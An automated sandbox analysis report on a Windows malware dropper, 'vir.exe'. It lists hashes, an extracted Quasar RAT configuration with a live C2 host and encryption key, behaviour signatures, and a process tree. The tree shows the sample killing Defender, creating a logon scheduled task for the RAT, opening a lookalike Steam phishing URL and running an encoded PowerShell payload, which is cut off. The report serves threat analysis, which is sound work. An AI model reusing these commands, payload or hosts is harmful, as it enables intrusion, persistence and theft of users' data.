Analysis

  • max time kernel
    175s
  • max time network
    191s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 21:58

Errors

Reason
Machine shutdown

General

  • Target

    vir.exe

  • Size

    311.5MB

  • MD5

    f8668357bf3d1a37eed8e3e732801fa4

  • SHA1

    2b2c0107682f84144312750bc4825ea33b42cf71

  • SHA256

    171a0ea728c1580e70ee769007d234299e967e23819c812b94d2673840215a95

  • SHA512

    efff516e15163874517225b13338cf305b74087419ffb5e4ff65d3691bae2df4167e8e1790465cb95a494aa07d2ed46e806364216b92a16f550f6b02e1a49761

  • SSDEEP

    6291456:Y2qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHJdHVeVM:rr+WeSWgfecGT4RjvqP85PAK

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Windows security bypass 2 TTPs 3 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Manipulates Digital Signatures 1 TTPs 1 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 15 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 21 IoCs
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3536
      • C:\Users\Admin\AppData\Local\Temp\vir.exe
        "C:\Users\Admin\AppData\Local\Temp\vir.exe"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2252
        • C:\Users\Admin\AppData\Local\Temp\15d135d0-8efd-4c2a-be04-54e55f4ee550\ProgressBarSplash.exe
          "C:\Users\Admin\AppData\Local\Temp\15d135d0-8efd-4c2a-be04-54e55f4ee550\ProgressBarSplash.exe" -unpacking
          3⤵
          • Executes dropped EXE
          PID:3200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\!main.cmd" "
          3⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:400
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K doxx.cmd
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3080
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig
              5⤵
              • Gathers network information
              PID:1864
            • C:\Windows\SysWOW64\net.exe
              net accounts
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2676
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 accounts
                6⤵
                  PID:3504
              • C:\Windows\SysWOW64\net.exe
                net user
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4864
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 user
                  6⤵
                    PID:2400
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /apps /v /fo table
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5924
              • C:\Windows\SysWOW64\PING.EXE
                ping google.com -t -n 1 -s 4 -4
                4⤵
                • Runs ping.exe
                PID:1572
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im WindowsDefender.exe
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3904
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K handler.cmd
                4⤵
                  PID:2688
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://stemcommunylty.com/glft/76561199126377093
                  4⤵
                  • Enumerates system info in registry
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:2860
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb933e46f8,0x7ffb933e4708,0x7ffb933e4718
                    5⤵
                      PID:1012
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,16993481678751162785,1572971547609716034,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
                      5⤵
                        PID:1504
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,16993481678751162785,1572971547609716034,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3980
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,16993481678751162785,1572971547609716034,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
                        5⤵
                          PID:3960
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,16993481678751162785,1572971547609716034,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                          5⤵
                            PID:3788
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,16993481678751162785,1572971547609716034,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                            5⤵
                              PID:3888
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,16993481678751162785,1572971547609716034,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
                              5⤵
                                PID:1192
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,16993481678751162785,1572971547609716034,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
                                5⤵
                                  PID:5824
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /K cipher.cmd
                                4⤵
                                  PID:1468
                                  • C:\Windows\SysWOW64\cipher.exe
                                    cipher /e
                                    5⤵
                                      PID:5736
                                    • C:\Windows\SysWOW64\cipher.exe
                                      cipher /e
                                      5⤵
                                        PID:3788
                                      • C:\Windows\SysWOW64\cipher.exe
                                        cipher /e
                                        5⤵
                                          PID:3880
                                        • C:\Windows\SysWOW64\cipher.exe
                                          cipher /e
                                          5⤵
                                            PID:5588
                                        • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\Rover.exe
                                          Rover.exe
                                          4⤵
                                          • Modifies WinLogon for persistence
                                          • UAC bypass
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          • Drops file in Program Files directory
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          • System policy modification
                                          PID:3740
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\web.htm
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3656
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb933e46f8,0x7ffb933e4708,0x7ffb933e4718
                                            5⤵
                                              PID:2184
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,9851855284402541849,8951259050087156753,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
                                              5⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5252
                                          • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\Google.exe
                                            Google.exe
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2212
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\helper.vbs"
                                            4⤵
                                              PID:5932
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping google.com -t -n 1 -s 4 -4
                                              4⤵
                                              • Runs ping.exe
                                              PID:5908
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping mrbeast.codes -t -n 1 -s 4 -4
                                              4⤵
                                              • Runs ping.exe
                                              PID:6028
                                            • C:\Windows\SysWOW64\xcopy.exe
                                              xcopy Google.exe C:\Users\Admin\Desktop
                                              4⤵
                                              • Enumerates system info in registry
                                              PID:1988
                                            • C:\Windows\SysWOW64\xcopy.exe
                                              xcopy Rover.exe C:\Users\Admin\Desktop
                                              4⤵
                                              • Enumerates system info in registry
                                              PID:5816
                                            • C:\Windows\SysWOW64\xcopy.exe
                                              xcopy spinner.gif C:\Users\Admin\Desktop
                                              4⤵
                                              • Enumerates system info in registry
                                              PID:5428
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /K bloatware.cmd
                                              4⤵
                                              • Checks computer location settings
                                              • Modifies registry class
                                              PID:5632
                                              • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\bloatware\1.exe
                                                1.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Modifies registry class
                                                PID:3304
                                                • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                  "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:804
                                                  • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                    "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{2EF711CF-2037-4B39-A0E6-10CE9A3FD19F} {FE4A67B1-13B1-4FAA-8AF3-0D5349A1F63C} 804
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:5432
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c install.bat
                                                  6⤵
                                                    PID:5124
                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                      regsvr32 /s "DroidCamFilter32.ax"
                                                      7⤵
                                                      • Loads dropped DLL
                                                      • Modifies registry class
                                                      PID:452
                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                      regsvr32 /s "DroidCamFilter64.ax"
                                                      7⤵
                                                      • Loads dropped DLL
                                                      PID:5920
                                                      • C:\Windows\system32\regsvr32.exe
                                                        /s "DroidCamFilter64.ax"
                                                        8⤵
                                                        • Loads dropped DLL
                                                        • Registers COM server for autorun
                                                        • Modifies registry class
                                                        PID:540
                                                  • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                    "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +v
                                                    6⤵
                                                    • Manipulates Digital Signatures
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    • Drops file in Windows directory
                                                    • Checks SCSI registry key(s)
                                                    • Modifies system certificate store
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1800
                                                  • C:\Program Files (x86)\DroidCam\lib\insdrv.exe
                                                    "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    • Drops file in Windows directory
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5552
                                                • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\bloatware\3.exe
                                                  3.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Modifies registry class
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2800
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1796
                                                    6⤵
                                                    • Program crash
                                                    PID:6076
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                  5⤵
                                                  • Blocklisted process makes network request
                                                  PID:5388
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /K SilentSetup.cmd
                                                  5⤵
                                                    PID:3612
                                                    • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
                                                      WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:3052
                                                      • C:\Users\Admin\AppData\Local\Temp\is-AJK6K.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-AJK6K.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$7022A,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
                                                        7⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:2552
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
                                                          8⤵
                                                            PID:396
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im winaerotweaker.exe /f
                                                              9⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1940
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
                                                            8⤵
                                                              PID:1704
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /im winaerotweakerhelper.exe /f
                                                                9⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3232
                                                    • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\regmess.exe
                                                      regmess.exe
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5392
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_411ed578-983c-41dd-99b6-149395984985\regmess.bat" "
                                                        5⤵
                                                          PID:5484
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 10
                                                        4⤵
                                                        • Delays execution with timeout.exe
                                                        PID:5200
                                                      • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\scary.exe
                                                        scary.exe
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6084
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                          5⤵
                                                          • Creates scheduled task(s)
                                                          PID:5644
                                                        • C:\Program Files\SubDir\Romilyaa.exe
                                                          "C:\Program Files\SubDir\Romilyaa.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:4892
                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                            "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                            6⤵
                                                            • Creates scheduled task(s)
                                                            PID:5812
                                                      • C:\Users\Admin\AppData\Local\Temp\vir_41f13c15-23ef-4e2e-a703-2f0faea50f08\the.exe
                                                        the.exe
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:2632
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACM